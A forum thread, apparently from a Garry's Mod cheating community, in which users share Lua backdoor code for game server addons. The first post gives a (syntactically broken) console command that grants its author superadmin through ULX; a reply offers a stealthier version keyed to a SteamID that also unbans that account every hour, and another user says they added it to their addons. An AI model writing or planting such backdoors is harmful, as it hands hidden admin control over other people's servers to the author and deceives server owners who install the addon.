Garry's Mod

My backdoor

Submitted by VladOperYT, , Thread ID: 162695

Thread Closed
15-03-2020, 08:18 AM
#1
My backdoor (easy to use)

Code:
concommand.Add("HACK", function(ply)
if ( ply:Nick() == "1" then
RunConsoleCommand("ulx", "adduser", ply:Nick(), "superadmin")
end)
end

RE: My backdoor

#2
thank you for sharing this very backdoor for the ulx and ulib

RE: My backdoor

#3
That is way too simple and would notify everyone on the server instead you should use this

concommand.Add( "Command", function( ply )
if ( ply:SteamID() == "steamid")
then
ply:SetUserGroup("superadmin")

timer.Create( "checkForBan", 3600, 0, function()
ULib.unban( "steamid" )
end )
end
end )

This will set you to superadmin and unban you if you get banned

RE: My backdoor

#4
You guys are insane thats fucking nice. Thanks for the help, Keep up

RE: My backdoor

#5
hacking is bad....
stop hacking today at hack stop 123-238420

RE: My backdoor

#6
Hehehe, if you are very careful, these backdoors will be easy to find :D

RE: My backdoor

#7
hahaahha, this is russian coder backdoor
TravkaCode (No add)
Nice man

RE: My backdoor

#8
omg it's amazing thanks you so much bro have a nice day

RE: My backdoor

#9
what does this do exactly please help me not sure what to do with it

RE: My backdoor

#10
simple, but working backdoor. Nice. I add this in my addons, but add STEAM ID check) :kekdog:

Users browsing this thread: 19 Guest(s)